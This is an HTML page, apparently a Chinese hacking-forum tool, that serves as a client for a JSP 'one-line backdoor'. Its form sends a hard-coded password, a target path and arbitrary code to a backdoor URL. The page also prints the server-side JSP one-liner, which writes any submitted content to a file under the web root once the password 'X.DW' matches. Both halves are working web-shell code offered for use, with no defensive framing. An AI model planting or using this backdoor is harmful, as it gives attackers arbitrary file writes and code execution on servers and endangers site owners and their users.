<html>
<head>
	<title>虚幻灵者JSP一句话后门</title>
</head>
<body>
<table width=100% align="left">
<tr><td>
<form action="" name="hack" method="post" onsubmit=dothis()>
  <table width=100% border="0" cellpadding="0" cellspacing="1" align="left">
	<tr>
	<td></td><td><font size=4><strong>虚幻灵者JSP一句话后门(X.DW收集自t00ls.net)</strong></font></td>
	</tr>
	<tr height=12><td></td></tr>
	<tr>
		<td align="right"><font size=3>提交地址:</font></td>
		<td title="一句话JSP后门地址"><input name="url" align="left" type=text size=50 value="http://www.1earn.net/root/door.jsp"></td>
	</tr>
	<tr>
		<td align="right"><font size=3>密码：</font></td>
		<td><input name="pass" type=text size=50 value="X.DW"></td>
	</tr>
	<tr>
		<td align="right"><font size=3>保存路径:</font></td>
		<td title="web的相对路径，如:可以是../images/test.jsp"><input name="file" type=text size=50 value="/door.jsp"></td>
	</tr>
	<tr>
		<td></td>
		<td><textarea name="code" cols=90 rows=10 width=45></textarea></td>
	</tr>
	<tr align="center">
		<td></td><td align="left"><input type="submit" value="submit"></td>
	</tr>
	<tr height=20><td></td></tr>
	<tr>
		<td align="right" width=200><font size=3>服务端代码：</font></td>
		<td><font size=2>&lt;%if(request.getParameter("pass").equals("X.DW")){java.io.FileOutputStream fs=new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("file"));fs.write(request.getParameter("code").getBytes());fs.close();}%></font></td>
	</tr>
  </table>
</form>
</td></tr>
</table>
<script>
function dothis(){
	var file=document.hack.file.value;
	var pass=document.hack.pass.value;
	var code=document.hack.code.value;
	
	if(file.length<4||pass.length==0||code.length==0){
		alert('数据输入错误，请出新输入');
		return;
	}else{
		document.hack.action=document.hack.url.value;
		document.hack.submit();
	}
}
</script>
</body>
</html>